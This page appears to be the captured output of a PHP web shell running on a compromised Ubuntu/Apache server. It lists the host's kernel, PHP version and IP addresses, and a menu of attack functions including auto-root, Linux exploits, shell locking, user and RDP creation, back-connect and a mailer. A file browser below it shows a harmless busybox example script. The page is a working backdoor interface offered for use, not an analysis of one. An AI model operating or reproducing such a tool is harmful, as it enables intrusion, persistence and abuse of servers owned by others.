Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
busybox-static /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
udhcp
[ DIR ]
drwxr-xr-x
mdev.conf
914
B
-rw-r--r--
mdev.conf.change_blockdev.sh
625
B
-rwxr-xr-x
mdev_fat.conf.gz
1.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mdev.conf.change_blockdev.sh
#!/bin/sh # Seconds to try to reread partition table cnt=60 exec </dev/null exec >"/tmp/${0##*/}.$$.out" exec 2>&1 ( echo "Running: $0" echo "Env:" env | sort while sleep 1; test $cnt != 0; do echo "Trying to reread partition table on $DEVNAME ($cnt)" cnt=$((cnt-1)) # If device node doesn't exist, it means the device was removed. # Stop trying. test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; } #echo "$DEVNAME exists" if blockdev --rereadpt "$DEVNAME"; then echo "blockdev --rereadpt succeeded" exit 0 fi echo "blockdev --rereadpt failed, exit code: $?" done echo "Timed out" ) &
Close